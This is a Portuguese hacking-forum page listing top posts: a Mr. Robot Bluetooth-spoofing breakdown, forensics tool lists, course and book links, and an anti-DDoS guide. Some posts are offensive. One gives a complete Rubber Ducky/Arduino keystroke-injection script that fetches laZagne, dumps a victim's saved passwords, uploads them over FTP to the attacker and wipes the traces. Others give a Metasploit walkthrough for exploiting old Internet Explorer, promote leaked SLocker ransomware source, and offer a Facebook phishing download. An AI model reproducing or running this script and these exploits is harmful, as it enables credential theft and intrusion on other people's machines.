Ir para conteúdo
  • Anúncios

    • Lord13

      ATENÇÃO - Sobre posts mal formatados   30/06/2017

      ATENÇÃO Por favor, caso tenha visto algum tópico ou post mal formatado, isto é, com tag à vista, favor denunciar o post ou marcar algum admin ou moderador. Isto porque quando o sistema mudou, algumas tags de formatação (BBCode) mudaram,  então alguns posts ficam mal formatador e/ou com as tags à mostra. Qualquer outro post que se aparente bagunçado também pode ser fator de mal formatação.

Tabela de Classificação


Conteúdo Mais Visto

Exibindo conteúdo com a maior reputação desde 20em todas áreas

  1. 7 pontos
    Mr. Robot, episódio 6. Como de costume, não decepcionante. Mais uma vez, nosso herói, Elliot, usou seu extraordinário intelecto e habilidades de hacking para nos inspirar. Neste episódio, Elliot está sendo chantageado pelo traficante de drogas implacável, Vera, para tira-lo da prisão. Shayla esta sendo refém e Elliot tem até a meia-noite para invadir o sistema de computador da cadeia para liberá-lo. Elliot tenta explicar a Vera que tal invasão não pode ser feita em questão de horas, mas sim dias ou semanas para encontrar uma vulnerabilidade de segurança que ele possa explorar. Pendrive malicioso Em sua primeira tentativa de invadir a prisão, Elliot e Darlene, sua parceira da Fsociety, "acidentalmente" deixam cair pendrives infectados perto da prisão. A estratégia aqui é que se alguém dentro da rede da prisão pegar um e inseri-lo no seu sistema de computador, irá ter injetado um malware e assim dando uma entrada para Elliot. Como esperado, um oficial pegou um e inseriu em seu computador. Elliot foi capaz de ter uma conexão remota, mas antes de poder fazer qualquer coisa, o software AV (antivírus) detecta a intrusão e desconecta Elliot. Elliot então questiona Darlene por ela ter pego um malware já conhecido (pelos antivírus, no caso), ao invés de desenvolver um próprio malware e então Darlene se defende dizendo que só tinha meia-hora. A rede Enquanto Elliot está visitando Vera na prisão, ele traz seu telefone com ele, no qual ele instalou um aplicativo de scanner Wi-Fi. Com esse scanner, ele pode ver todos os APs sem fio e vê que todos estão usando WPA2. Embora ele saiba que pode quebrar WPA2, porem o tempo é curto para que ele possa fazer um bruteforce na rede. No processo de descoberta de hotspots sem fio e tecnologias de criptografia com seu telefone, Elliot vê uma conexão Bluetooth quando o carro de um agente passa perto dele. Isso estimula Elliot a uma nova estratégia, invadir o Bluetooth e entrar no sistema de computador da prisão através da conexão dedicada do carro da policia à prisão. A estratégia de Elliot aqui é falsificar a conexão Bluetooth do carro da polícia com o teclado. Se ele pode fazer o laptop acreditar que seu teclado é realmente o teclado do policial, ele pode controlar o laptop do policial e entrar na rede da prisão. Uma vez dentro da rede, ele pode enviar malware para assumir o controle dos sistemas controlados digitalmente da prisão. Ativando o Bluetooth Antes que Elliot possa fazer qualquer coisa, ele precisa habilitar o Bluetooth em seu sistema: service bluetooth start Em seguida, ele precisa ativar o dispositivo Bluetooth: hciconfig hci0 up Então ele verifica se ele realmente está funcionando, digitando: hciconfig hci0 Observe o "Endereço BD" na segunda linha - este é o endereço MAC do dispositivo Bluetooth. Procurando dispositivos Bluetooth A primeira coisa que Elliot no processo de invasão é procurar conexões Bluetooth. Se você olhar de perto a tela de Elliot, você pode ver que ele está usando o hcitool, uma ferramenta de configuração Bluetooth integrada no Kali Linux. Embora isso funcione, tive um melhor desempenho com o btscanner, um scanner Bluetooth. Para usá-lo, digite: btscanner Em seguida, selecione "i" para iniciar uma verificação de inquérito. Você pode ver os resultados abaixo. Usando o btscanner, podemos obter uma lista de todos os dispositivos Bluetooth por perto. Este aqui tem um endereço MAC e um nome de "Tyler" - para falsificar este dispositivo, devemos falsificar o endereço MAC e o nome do dispositivo. É assim que Elliot recebe o endereço MAC e o nome do dispositivo Bluetooth do carro do policial. Lembre-se de que o Bluetooth é um protocolo de baixa potência com um alcance de apenas cerca de 10 metros (embora com uma antena direcional, distâncias até 100 metros foram alcançadas). Spoof o endereço MAC do teclado Agora que Elliot tem o nome e o endereço MAC do teclado do policial, ele precisará clonar o teclado do policial com essas informações. O Kali Linux possui uma ferramenta projetada para spoof de dispositivos Bluetooth chamados de spooftooph. Podemos usá-lo para falsificar o teclado com um comando semelhante a este: spooftooph -i hci0 -a A0:02:DC:11:4F:85 -n Car537 -i Determina o dispositivo, neste caso hci0 -a Determina o endereço MAC que queremos falsificar -n Determina o nome do dispositivo que queremos falsificar, neste caso "Car537" Se o fizermos corretamente, nosso dispositivo Bluetooth irá falsificar o endereço MAC e o nome do dispositivo Bluetooth do computador do policial. Para verificar se foi bem sucedido, podemos usar o hciconfig seguido do dispositivo e o "nome" do switch que irá listar o nome do dispositivo. Lembre-se, este é o nosso dispositivo Bluetooth que estamos tentando emular com o dispositivo Bluetooth do carro de polícia. Se tivermos sucesso, ele terá o mesmo endereço MAC e o nome do dispositivo Bluetooth do policial. hciconfig hci0 name Agora, temos um dispositivo Bluetooth que é um clone perfeito do teclado Bluetooth do carro da polícia! O link do serviço bluetooth para o laptop do policial Agora é aqui onde o roteiro e realidade de Mr. Robot se divergem. O hacking de Mr. Robot é realista, porém as vezes, o diretor precisa deixar as coisas um pouco mais fictícias. E isso é permitido pois as obras não devem se limitar pela realidade. Para que o Eliot se conecte agora ao laptop do carro de polícia, ele precisaria da chave de link (esta é uma chave para identificar o dispositivo Bluetooth previamente emparelhado) que foi trocada entre o teclado e o adaptador Bluetooth no laptop. Ele poderia adivinhar (improvável) ou crack-lo, mas não será tão rápido como apareceu no show. Outra possibilidade é que, quando o sistema foi reiniciado ou o teclado foi desconectado, Elliot pode se conectar ao laptop, pois é um clone do teclado do policial. Em ambos os casos, levaria mais tempo do que Elliot tinha neste episódio para cortar o teclado Bluetooth do policial. Hackeando a prisão Na etapa final, Elliot usa o computador hackeado do policial para fazer upload de um malware via FTP, que lhe dará o controle das portas das celas da prisão. Poucas pessoas sabem que prisões e outros sistemas industriais, muitas vezes usam SCADA (Sistemas de Supervisão e Aquisição de Dados). Estes sistemas industriais possuem PLCs. Presumivelmente, essa prisão tinha PLCs controlando as portas das celas da prisão (uma suposição muito razoável) e o malware de Elliot infectou-os e lhe deu controle, permitindo-lhe abrir todas as celas, liberando Vera e todos os outros prisioneiros.
  2. 6 pontos
    O código-fonte de uma das mais antigas famílias de ransomware para dispositivos móveis e populares foi vazado on-line, tornando-o disponível para cibercriminosos que podem usá-lo para desenvolver variantes mais personalizadas e avançadas do ransomware Android. O código-fonte do resgate do SLocker , que viu um aumento de seis vezes no número de novas versões nos últimos seis meses,foi vazado no GitHub e agora está disponível para quem quiser. O código-fonte do SLocker foi vazado por um usuário que usa 'fs0c1ety' como um moniker online e pede a todos os usuários do GitHub que contribuam para o código e enviem relatórios de erros. SLocker ou Simple Locker é tela de bloqueio móvel e ransomware de criptografia de arquivos que criptografa arquivos no telefone e usa a comunicação Tor for command and control (C & C). O malware também se colocou como órgãos de aplicação da lei para convencer as vítimas a pagar o resgate.Famosa por infectar milhares de dispositivos Android em 2016, pesquisadores de segurança descobriram mais de 400 novas variantes do resgate de SLocker em estado selvagem em maio, e logo depois de um mês, o desagradável sistema de ransomware Android foi visto copiando a GUI do WannaCry.Uma vez infectado, o SLocker corre silenciosamente no fundo do dispositivo de uma vítima sem o seu conhecimento ou consentimento e criptografa imagens, documentos e vídeos em dispositivos móveis.Uma vez que tenha arquivos criptografados no dispositivo, o ransomware do Android seqüestra o telefone,Por que você deveria se preocupar?Estando em ação a partir de 2015, a SLocker se destaca como uma das primeiras amostras de ransomware para criptografar arquivos do Android. O malware modificou-se além de apenas bloqueando telas e exigindo pagamento para assumir os direitos administrativos e controlar o microfone, altifalantes e a câmera do dispositivo. E agora, desde que o código-fonte deste ransomware Android desagradável foi lançado on-line no GitHub, os dispositivos Android provavelmente receberão um número crescente de ataques de resgate nos próximos dias.O código fonte vazado seria uma oportunidade de ouro para aqueles que sempre buscam oportunidades como esses programas de malware apenas são oferecidos para venda em fóruns subterrâneos, mas o SLocker agora está acessível para cibercriminosos e fraudadores GRATUITAMENTE.No início deste ano, os pesquisadores descobriram uma variante do BankBot banking trojan in the wild, que foi desenvolvido usando o código-fonte vazado para o malware em um fórum subterrâneo de hacking. ----> Como se proteger? Como mencionei anteriormente, os usuários sempre recomendam seguir algumas precauções básicas para se proteger contra tais ameaças: * Nunca abra anexos de email de fontes desconhecidas. * Nunca clique nos links em mensagens SMS ou MMS. * Mesmo que o e-mail pareça legítimo de alguma empresa, vá diretamente para o site de origem e verifique todas as atualizações possíveis. * Vá para Configurações → Segurança e Desligue "Permitir a instalação de aplicativos de fontes diferentes da Play Store".Mantenha sempre seus dispositivos Android, aplicativos e aplicativos antivírus atualizados. * Evite hotspots Wi-Fi desconhecidos e não protegidos e mantenha o Wi-Fi desligado quando não estiver em uso. Link: https://github.com/fs0c1ety/SLocker Hacker Security.
  3. 5 pontos
    E ae galera, hoje trago pra vocês algumas ferramentas para forense. Algumas eu não consegui traduzir. 1 - ChromeForensics Uma ferramenta para realizar análises forenses automatizadas do navegador Chrome. https://github.com/AnimeshShaw/ChromeForensics 2 - Android-Forensics AFLogical OSE: aplicativo e framework forense-android de código aberto https://www.nowsecure.com/ https://github.com/viaforensics/android-forensics 3 - Timesketch O Timesketch é uma ferramenta de código aberto para análise colaborativa da linha de tempo forense. https://github.com/google/timesketch 4 - USBTracker https://github.com/sysinsider/usbtracker 5 - Linux Security Auditing Tool (LSAT) A Ferramenta de auditoria de segurança do Linux (LSAT) é um auditor de segurança pós-instalação para Linux / Unix. Ele verifica muitas configurações de sistema e configurações de rede locais no sistema para erros comuns de segurança / configuração e para pacotes que não são necessários. (Por enquanto) funciona sob Linux (x86: Gentoo, RedHat, Debian, Mandrake; Sparc: SunOS (2.x), Redhat sparc, Mandrake Sparc; Apple OS X) http://usat.sourceforge.net/ 6 - RAT Decoders http://kevthehermit.github.io/RATDecoders/ 7 - Bro Network Security Monitor Bro é uma poderosa estrutura de análise de rede que é completamente diferente do IDS típico que você conhece, com as vantagens de adaptabilidade, eficiência, flexibilidade, interface aberta e código aberto. https://www.bro.org/index.html 8 - Xplico Xplico é uma ferramenta de análise forense de rede aberta para testes forenses digitais e de penetração. http://www.xplico.org/ 9 - PowerForensics O PowerForensics é uma estrutura de forense digital - Powershell. Ele atualmente suporta NTFS e adicionou o sistema de arquivos ext4 durante o processo de demonstração. https://github.com/Invoke-IR/PowerForensics 10 - GRR Rapid Response GRR Rapid Response é uma estrutura de resposta de emergência de eventos que se concentra em forense de sites remotos. É um cliente Python proxy que é instalado no sistema alvo e pode gerenciar e comunicar a infraestrutura Python. https://github.com/google/grr 11 - Mozilla InvestiGator https://github.com/mozilla/mig 12 - Autopsy http://www.sleuthkit.org/autopsy/ 13 - JOy Pode ser usado para capturar e analisar o pacote de dados de tráfego de rede, principalmente para levantamento de rede, monitoramento de segurança e forense. https://github.com/davidmcgrew/joy 14 - Rekall O framework Rekall é um conjunto totalmente aberto de ferramentas projetadas para introduzir a tecnologia e a complexidade do forense digital a partir da RAM e fornecer uma plataforma para uma pesquisa mais profunda nesta área. https://github.com/google/rekall 15 - FastIR Collector O que pode ser coletado inclui tudo o que você pode pensar.. memória, registro, informações de arquivos e assim por diante. https://github.com/SekoiaLab/Fastir_Collector
  4. 4 pontos
    Phishing Facebook DOWNLOAD VIRUS TOTAL
  5. 4 pontos
    Eae galera este é o meu primeiro post neste fórum com intuito de compartilhar conhecimento . Então, o tutorial é sobre a exploração do Windows 7 com o uso da CVE 2010-3971. Já é um exploit antigo, pois foi descoberto em 2010, mas ainda pode-se brincar com o mesmo . Atualmente, a maioria das pessoas têm as versões de seus browsers, atualizadas. Não com as últimas atualizações, mas atualizações necessárias, para que se torne quase impossível fazer uma invasão com este exploit(é como se tivessemos a tentar invadir um servidor FTP moderno, usando o exploit VSFTPD v2.3.4, quase impossível). Por isso, que é necessário sempre fazer um fingerprint, para que seja possível descobrir o SO, versões do sistema atuais e etc, e assim poder efetuar uma invasão com base na vulnerabilidade descoberta . Então, vamos fazer uma invasão numa máquina virtual(a vossa escolha, eu estarei a usar o virtualbox),nela deverá estar instalada uma versão antiga do Internet Explorer no Windows 7(recomendado), pois somente irá funcionar nesse browser e nessa versão antiga . 1. Tendo o metasploit instalado, abra o msfconsole . 2. Selecione o exploit "exploit/windows/browser/ms11_003_ie_css_import" 3. use o comando "show options" para ver os campos que devem ser preenchidos, e caso queira mais informações em relação ao exploit, use o comando "info" . Eu recomendo apenas colocar o seu endereço ip local, e manter o resto , principalmente a porta que será usada, para a conexão com a máquina da vítima . 4. Após preencher os dados, use o comando "exploit" para colocar o metasploit no modo listening( é modo que aguarda por conexões ). E será gerado um link. 5. Copie o link que foi gerado, e abra o Internet Explorer do Windows da maquina virtual(ou da vítima), cole o link na URL do browser . 6. E por fim, com o comando "sessions", selecione a sessão onde a vítima se encontre .E pronto você está dentro da máquina da vítima . DESFRUTE! By: darkAsylum00
  6. 3 pontos
    Pessoal, publiquei um artigo questionando qual é a mensagem real por trás da série Mr. Robot, quais motivos levam a Fsociety a lutar contra a Corp do Mal e porquê eles precisam fazer isso. Segue o link: https://fsocietybrasil.org/qual-e-a-mensagem-politica-passada-em-mr-robot/
  7. 3 pontos
    Ora ora, parece que temos um Hacker aqui!
  8. 2 pontos
    Ele é um sistema operacional focado em segurança de sistemas Wireless. Você irá encontrar muitas ferramentas nele, como Aircrack-ng, Fluxion, Linset e muitos outros. E bem, ele pode sim quebrar, desde que saiba usar corretamente.
  9. 2 pontos
    Este script, poderá ser usado como o arduino leonardo (como usb rubber ducky), ou na USB Rubber Ducky da Hak5, para obter passwords da memoria no sistema windows, utilizando o script python laZagne (https://github.com/AlessandroZ/LaZagne) Script para USB Rubby Ducker (Substituir onde tem /////, pelas informações que pede, Host FTP, usuario, password) REM Descobrir passwords browsers, pc REM Script laZagne para windows DELAY 1000 GUI r STRING cmd DELAY 300 ENTER DELAY 500 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER DELAY 500 STRING powershell (new-object System.Net.WebClient).DownloadFile('https://cld.pt/dl/download/d8d3213c-aca4-495b-8089-84f25f9a569d/laZagne.exe?download=true','%TEMP%\laZagne.exe') DELAY 300 ENTER DELAY 7000 STRING %TEMP%\laZagne.exe all -oN DELAY 300 ENTER DELAY 4000 STRING cd results DELAY 300 TAB DELAY 300 ENTER DELAY 300 STRING ftp DELAY 300 ENTER DELAY 100 STRING open DELAY 300 ENTER DELAY 100 STRING ///// Host FTP DELAY 300 ENTER DELAY 500 STRING ///// Usuário DELAY 300 ENTER DELAY 300 STRING ///// Palavra-Pass DELAY 300 ENTER DELAY 1000 STRING cd public_html DELAY 300 ENTER DELAY 300 STRING put *.txt DELAY 300 ENTER DELAY 1000 STRING quit DELAY 300 ENTER DELAY 300 STRING cd .. DELAY 300 ENTER DELAY 300 STRING del results DELAY 300 TAB DELAY 300 ENTER DELAY 300 STRING del %TEMP%\laZagne.exe DELAY 300 ENTER DELAY 300 STRING exit DELAY 300 ENTER Para Arduino Leonardo: /* * Generated with <3 by Dckuino.js, an open source project ! */ #include "Keyboard.h" void typeKey(uint8_t key) { Keyboard.press(key); delay(50); Keyboard.release(key); } /* Init function */ void setup() { // Begining the Keyboard stream Keyboard.begin(); // Wait 500ms delay(500); // Descobrir passwords browsers, pc // Script laZagne para windows delay(1000); Keyboard.press(KEY_LEFT_GUI); Keyboard.press('r'); Keyboard.releaseAll(); Keyboard.print(F("cmd")); delay(300); typeKey(KEY_RETURN); delay(500); Keyboard.press(KEY_LEFT_ALT); Keyboard.press(' '); Keyboard.releaseAll(); Keyboard.print(F("M")); for(int i = 0; i < 100; i++) { typeKey(KEY_DOWN_ARROW); } typeKey(KEY_RETURN); delay(500); Keyboard.print(F("powershell (new-object System.Net.WebClient).DownloadFile('https://cld.pt/dl/download/d8d3213c-aca4-495b-8089-84f25f9a569d/laZagne.exe?download=true','%TEMP%\\laZagne.exe')")); delay(300); typeKey(KEY_RETURN); delay(7000); Keyboard.print(F("%TEMP%\\laZagne.exe all -oN")); delay(300); typeKey(KEY_RETURN); delay(4000); Keyboard.print(F("cd results")); delay(300); typeKey(KEY_TAB); delay(300); typeKey(KEY_RETURN); delay(300); Keyboard.print(F("ftp")); delay(300); typeKey(KEY_RETURN); delay(100); Keyboard.print(F("open")); delay(300); typeKey(KEY_RETURN); delay(100); Keyboard.print(F("///// Host FTP")); delay(300); typeKey(KEY_RETURN); delay(500); Keyboard.print(F("///// Usuário")); delay(300); typeKey(KEY_RETURN); delay(300); Keyboard.print(F("///// Palavra-Pass")); delay(300); typeKey(KEY_RETURN); delay(1000); Keyboard.print(F("cd public_html")); delay(300); typeKey(KEY_RETURN); delay(300); Keyboard.print(F("put *.txt")); delay(300); typeKey(KEY_RETURN); delay(1000); Keyboard.print(F("quit")); delay(300); typeKey(KEY_RETURN); delay(300); Keyboard.print(F("cd ..")); delay(300); typeKey(KEY_RETURN); delay(300); Keyboard.print(F("del results")); delay(300); typeKey(KEY_TAB); delay(300); typeKey(KEY_RETURN); delay(300); Keyboard.print(F("del %TEMP%\\laZagne.exe")); delay(300); typeKey(KEY_RETURN); delay(300); Keyboard.print(F("exit")); delay(300); typeKey(KEY_RETURN); // Ending stream Keyboard.end(); } /* Unused endless loop */ void loop() {} Depois é so compilar para o respetivo.
  10. 2 pontos
    E ae galera. Hoje vamos falar sobre a insegurança em servidores locais. Imagine você hospedar um servidor local em uma maquina virtual sem nenhum firewall. Já pensou que isso é uma porta de entrada para criminosos? 1 - Levantamento de informações. Você acaba de configurar um servidor e nisso quer que outras pessoas acessem, sendo o acesso via HTTP(S) / FTP / SSH e entre outros. Você também ativa o modo bridge. Então temos: > Um servidor local hospedado em uma maquina virtual. > Protocolos rodando. > Modo bridge ativo. > Nenhum firewall. 2 - Levantamento de vulnerabilidades O levantamento de vulnerabilidades é o mais importante, é um dos métodos que o atacante pode usar para entrar no sistema. Entretanto, eu não especifiquei qual o sistema operacional que esta rodando, mas isso não interfere. No levantamento de informações o atacante pode pegar o OS por uma simples linha de comando: nmap <target> -o Pegando o sistema operacional / portas abertas, o atacante vai atrás de vulnerabilidades. Podemos procurar vulnerabilidades correspondentes com os nossos resultados de fingerprint. Em uma simples linha de comando, o atacante pode procurar varias vulnerabilidades naquele alvo. Existe uma ferramenta chamada searchsploit. No terminal, digite: searchsploit -h Vai te retornar tudo sobre ele e como usar. Eu consegui pegar a versão do FTP que estava rodando, então vou procurar alguma vulnerabilidade searchsploit ProFTPd 1.3.5 Encontramos um exploit. 3 - Invasão e mapeamento Achada a vulnerabilidade e o exploit, o atacante entra no sistema alvo. Dentro do sistema, o atacante faz o mapeamento. Principais ferramentas para isso: - Nmap - Maltego - Netdiscover. E entre outras. A primeira coisa é saber onde o sistema esta rodando, o atacante verifica se o sistema esta rodando localmente. Sabendo que o sistema esta em uma maquina virtual o atacante pode encontrar meios de entradas para o OS principal, como por exemplo, pastas compartilhadas ou até mesmo HD externos / pendrives. Agora digamos que não tem nada disso, mas tem o bridge ativo. Com o bridge ativo da pro atacante fazer muitas coisas, como por exemplo, redirecionamento de DNS (já fiz vários artigos, procure aqui no forum). Além disso, sabendo o IP padrão do modem / roteador, o atacante pode rodar o netdiscover e assim pegar outras maquinas na rede, fazendo outro scanner para achar vulnerabilidades / hosts, depois disso fazendo o pivoting.
  11. 2 pontos
    Recon Dog é uma ferramenta completa em todas as suas necessidades básicas de coleta de informações. Ele usa APIs para reunir todas as informações para que sua identidade não seja exposta. Baixar e executar o Recon Dog: Digite o seguinte comando no terminal para fazer o download: --> git clone https://github.com/UltimateHackers/ReconDog Depois de baixar o programa, digite o seguinte comando para navegar até o diretório Recon Dog e listar o conteúdo --> cd ReconDog && ls Agora execute o script com o seguinte comando. --> python dog.py fonte:http://www.kitploit.com/2017/07/recondog-all-in-one-tool-for-all-your.html
  12. 2 pontos
    Fala galera , Tudo certo? então, deixo pra vocês hoje um curso que vai ajudar muito em relação ao inglês de vocês O curso têm o formato apostila onde você ler e se orienta ao curso e uma pasta com áudios referentes ao listening de vocês!! https://goo.gl/WznJY7 ENJOY, TOO MUCH !!
  13. 2 pontos
    Título: Arquitetura de Sistemas Operacionais Autor(es): Francis Berenger Machado, Luiz Paulo Maia. Edição: 4. Editora: LTC Este livro aborda o funcionamento e a arquitetura de sistemas operacionais modernos, como Unix e Windows, situações como gerência de UCP, gestão de memória estática e dinâmica, escalonamento de processos, arquiteturas de dados e processamento, gerência de processos e tudo mais que for relacionado à este tipo de tecnologia. Este livro é muito útil para quem cursa, Análise e Desenvolvimento de Sistemas ou Sistemas de Informação pois aborda matéria de vários semestres. Abaixo segue a capa do Livro. Arquitetura de Sistemas Operacionais - Luis Paulo Maia.pdf
  14. 2 pontos
    Web D1r3ct0ry Hunt3r 🇧🇷 Procure e encontre diretórios facilmente com Web D1r3ct0ry Hunt3r, não se preocupe com wordlist já usamos uma por padrão 🇺🇸 Browse and find directories easily with Web D1r3ct0ry Hunt3r, do not worry about wordlist we already use one by default
  15. 2 pontos
    [Full - Livros / PDFs] - Olá soldados da Fsociety Brasil! Venho hoje compartilhar uma pasta no Google Drive que nela contém diversos LIVROS. ( Espero que gostem ) LINK --> https://goo.gl/3dNSL2 LINK --> https://goo.gl/3dNSL2 LINK --> https://goo.gl/3dNSL2
  16. 2 pontos
    Eae galera, sou novo aqui neste fórum da fsociety brasil . Eu sou o darkAsylum00(Podem me chamar de Asylum), tenho 16 anos, e sou um estudante de Programação e Pentest. Pretendo compartilhar o meu conhecimento com vocês, e aprender tbm .
  17. 1 ponto
    Então, não seria bem como fazer um Bypass... mas hoje pela madrugada descobri algo interessantíssimo sobre a rede de internet de onde moro. Ela é uma rede aberta, logo o serviço de internet deve usar alguma artimanha para permitir somente alguns a navegar. E já começa errado quando essa artimanha é um sistema de login onde o usuário e senha é ligado ao MAC de um dispositivo que se encontra fora da casa. Todos sabemos do perigo do bloqueio por MAC assim, né? Então, para acabar de completar, desde sempre eu tinha notado que mesmo sem fazer login, o uTorrent continua baixando (isso em velocidade bem baixa). Mas sabe por quê? O sistema de login não proíbe de acessar, mas "dificulta"... quando digito "google.com" na barra de endereço, ele me redireciona para "192.168.192.1/login?dst=https://www.google.com". Daí surge uma brechinha. Essa internet também possui um problema que durante a noite, o meu login sai. Então criei um script que verifica se está conectado e então loga caso não. Testando o script que eu notei o problema algo interessante... eu estava baixando uns vídeos do Youtube... e estavam baixando à velocidade normal (90~150Kbps), mas como eu não interrompi a conexão do download, somente desfiz o login para testar o script. O download continuou.... e a valocidade aumentou significativamente. E não é por causa que era pela madrugada, eu cheguei a testar inúmeras vezes. Como eu disse, minha internet de 1,5Mbps baixa a 90~150KBps, agora olhe a velocidade que atingiu: O único problema é que é somente válido se estiver em uma conexão, ou seja, ao terminar... não baixa mais nada, afinal está sem logar, né?
  18. 1 ponto
    1) Khan Academy Khan Academy é uma ONG educacional criada e sustentada por Salman Khan. Com a missão de fornecer educação de alta qualidade para qualquer um, em qualquer lugar , oferece uma coleção grátis de mais de 3.800 vídeos Site = khan academy 2) cursou A cursou é um site que reúne os vários videos de computação/programação gratuitos que já estão na web, de uma forma mais organizada. Alem de informática eles possuem outros cursos de outras áreas. Site= Cursou 3) Eu posso programar A Microsoft criou o site “Eu posso programar” com objetivo de ensinar programação para crianças e adolescentes, ele oferece conteúdo online e exclusivo de programação. Todos os cursos também oferecem certificado de conclusão. Site = Eu posso programar 5) FIAP X Fiap X é um site com conteúdos gratuitos de informática, produzido pela FIAP (Faculdade de Informática e administração Paulista). São cursos online, artigos e podcasts para aprofundar seus conhecimentos em tecnologia, inovação e empreendedorismo. Site = FIAPx 6) Fundação Bradesco A escola virtual da fundação Bradesco trata-se de um ambiente virtual que oferece diversos cursos inclusive de informática nas modalidades on-line e semipresencial, com arquitetura projetada para atender até 150 mil alunos a distância, oferecendo cursos totalmente gratuitos. Site = Fundação Bradesco 7) Microsofit Virtual Academy O Microsoft Virtual Academy oferece treinamento online grátis em TI, desenvolvimento e ciências de dados apresentados por especialistas de categoria internacional para ajudar você a desenvolver suas habilidades e avançar sua carreira. Site = Microsofit Virtual Academy
  19. 1 ponto
    Fala ae hackudões, Wheezy novamente aqui com mais um post ^^ Muito material para estudos abaixo: [Alura] Big Data: Uma introdução a data analysis na prática --> https://mega.nz/#F!w0lE0CwJ!0C8jJ6gk-NnnhgCFHNTPjQ [Alura] Carreira Desenvolvedor Wordpress --> https://mega.nz/#F!I5dnjbLI!5PxZWKAGBszv1e6YS4tobw [Alura] Carreira PHP Júnior --> https://mega.nz/#F!go9yFJgY!Rc-ldt4r97ORQ3ab9mxpNQ [Alura] Curso Alura Ruby --> https://mega.nz/#F!Z8snUS7R!5lVTwqJpbzwAUJ7TMWJviQ [Alura] Docker na Prática --> https://mega.nz/#F!ktEyEbCb!bmHtvmcu8Nxe30wxDj40fw [Alura] Git: Controle e compartilhe seu código --> https://mega.nz/#F!UxdkGDzK!1mcrvVlzovSy4ZmBsjDVfw [Alura] MySQL II: Consultas poderosas --> https://mega.nz/#F!kgNkSYBZ!9v_7xpNu13VBVnR5OdDHjA [Alura] Photoshop para web I --> https://mega.nz/#F!hokxDCQL!_mW8hP9Qr8nl1_BJmbbgMw Cursos de Automação Front-end --> https://mega.nz/#F!x0kikKTJ!_StsskBfe3-zXtP8dQmgqQ Cursos de Frameworks MVC --> https://mega.nz/#F!FsFHnAxb!0HKyxSkFE-eKc_MAUuptWg Cursos de HTML e CSS --> https://mega.nz/#F!AwMgCDYL!GvRevuoSD4Il6KIWnsPhUA Cursos de JavaScript --> https://mega.nz/#F!shcSBJgQ!F-gR-ISvycxwW1DTzvfa9g Cursos de JQuery --> https://mega.nz/#F!g8knHQpA!0Q9D4L9PIYH4DKVPbl04oA Trilha Agilidade --> https://mega.nz/#F!xtsykA6B!O0Bwb8Js5q7W11Edtee2mQ Trilha Android --> https://mega.nz/#F!0xMGFBaK!tT3HTPLBkfdvRrw412OWXw Trilha C# e .NET --> https://mega.nz/#F!AoETxB6R!vLWLYCDb3-YgaRu9AzMP8A Trilha HTML e Front End --> https://mega.nz/#F!B4thnQqD!hfMguutJ7noa_F3KHOn6zA Trilha Infraestrutura --> https://mega.nz/#F!l8t3DJCT!BXcIc1Kqw0XlnQt_3thQzg Trilha Java --> https://mega.nz/#F!Up813YJB!2LHj7dhdPoA6xEsbix643g Trilha Java Avancado --> https://mega.nz/#F!s40xyD5Q!ZB3XJaJD-Hqux2QrLNcX6w Trilha Java para Web --> https://mega.nz/#F!U1FzjTAL!u7JW1V48PCYvT84f1wxkfA Trilha PHP --> https://mega.nz/#F!stsnmBrC!gqyNUwozV-yHUYCQf22pHw Trilha Ruby e Rails --> https://mega.nz/#F!x0tQQBrJ!3WF1GuxYgff3B06hOL4gTw Trilha Testes de Software --> https://mega.nz/#F!wtthUJza!oLLUrewy5pn2LJexaIxk4w http://computeirodadepressao.com/quase-2tb-terabytes-em-cursos-de-ti-para-download-o-computeiro-pirou/ THE BEST: https://mega.nz/#F!wVsCjS7A!K7jrAMW6b7RX_AC6TT3msA!EUFTxKiR http://cursos.escolalinux.com.br/curso/introducao-a-programacao-java-14-horas?ref=B4887343E Especiais ^^ 1-https://mega.nz/#F!KIRE3DDS!RSwncUf5rVV_RZ_GLu-ccA!GYgRDYIT ***************************************************************************** https://mega.nz/#F!g0ozSBYa!aAqiyDHhwltAz9Du-niZSA https://mega.nz/#F!w1hGTCBT!lXFEwX-9PwKinuIUqCFn4Q ***************************************************************************************** https://mega.nz/#F!tBYmySLR!6MYhJPB0T3xh8WjjH0H18w!4ERQTQ5K https://mega.nz/#F!ABomHbSC!8ueqTOFFddwTXrz09aKDWA **************************************************************************************** Curso Hacking https://mega.nz/#F!vVoUhSrY!CCRwM3BC7U31BaAFZHl5SQ ***************************************************************************** By: Wheezy BONS ESTUDOS!!
  20. 1 ponto
    Bang your shyness, be yourself in here.
  21. 1 ponto
    Em meio a ataques de negação de serviço distribuídos que assolam os servidores web, precisamos tomar medidas para que nossa infraestrutura não seja prejudicada e também para não perdermos nossos empregos. Atualmente temos a nossa disposição diversos serviços para pelo menos tentar mitigar estes ataques. São eles: Cloudflare, Incapsula, AWS Shield, Akamai. F5 e muitos outros. NSHIELD E IPTABLES O nShield é uma solução simples Anti-DDoS baseada em iptables para VPS, servidores dedicados e dispositivos IoT (Internet das Coisas). O Iptables é a ferramenta que permite a criação de regras de firewall. O Netfilter é um módulo do kernel do Linux que fornece as funções de firewall, NAT e log dos dados para o Iptables. Iptables não é um firewall, e sim uma interface para trabalhar com os recursos de firewall fornecidos pelo Netfilter. REQUERIMENTOS PARA INSTALAÇÃO Uma distribuição Linux com Iptables; Python; Nginx (Será instalado automaticamente pelo script install.sh). INSTALAÇÃO RÁPIDA cd ~ git clone https://github.com/fnzv/nShield.git bash nShield/install.sh Tenha em mente que o script install.sh substituirá todas as suas regras de Iptables atuais. COMO USAR O script da instalação acima instalará o suporte ao Python caso não esteja presente e fará o download de todo o repositório com exemplos de arquivos de configuração, em seguida executará o script para realizar algumas configurações e uma rotina na cron que executará a cada 30 minutos para checar as conexões com bases nas configurações de IPs (IPSET). Você pode encontrar exemplos de arquivos de configuração no diretório examples. A verificação manual do HTTPS é executada com este comando dentro do diretório do repositório: python nshield-main.py -ssl O script Python após verificar a configuração, solicitará que você informe um endereço de e-mail (para o Let´s Encrypt por exemplo) e mudará o domínio de seu DNS para o nShield server e fará um pedido de confirmação para o SSL DNS. Exemplo: Agora seu domínio está verificado e um certificado SSL é emitido para a configuração do Nginx. Você poderá alterar o registro A de seu DNS para este servidor. COMO FUNCIONA? Basicamente este script é configurado por padrão para ser executado a cada 30 minutos para verificar o arquivo de configuração a fim de que as seguintes operações sejam executadas: - Obter as últimas listas de BOTs, Spammers, reputação de IPs/Redes suspeito(a)s e verificar se esses caras estão atacando seu servidor (valeu FireHol http://iplists.firehol.org/); - Habilitar métodos Anti-DDoS básicos para negar tráfego 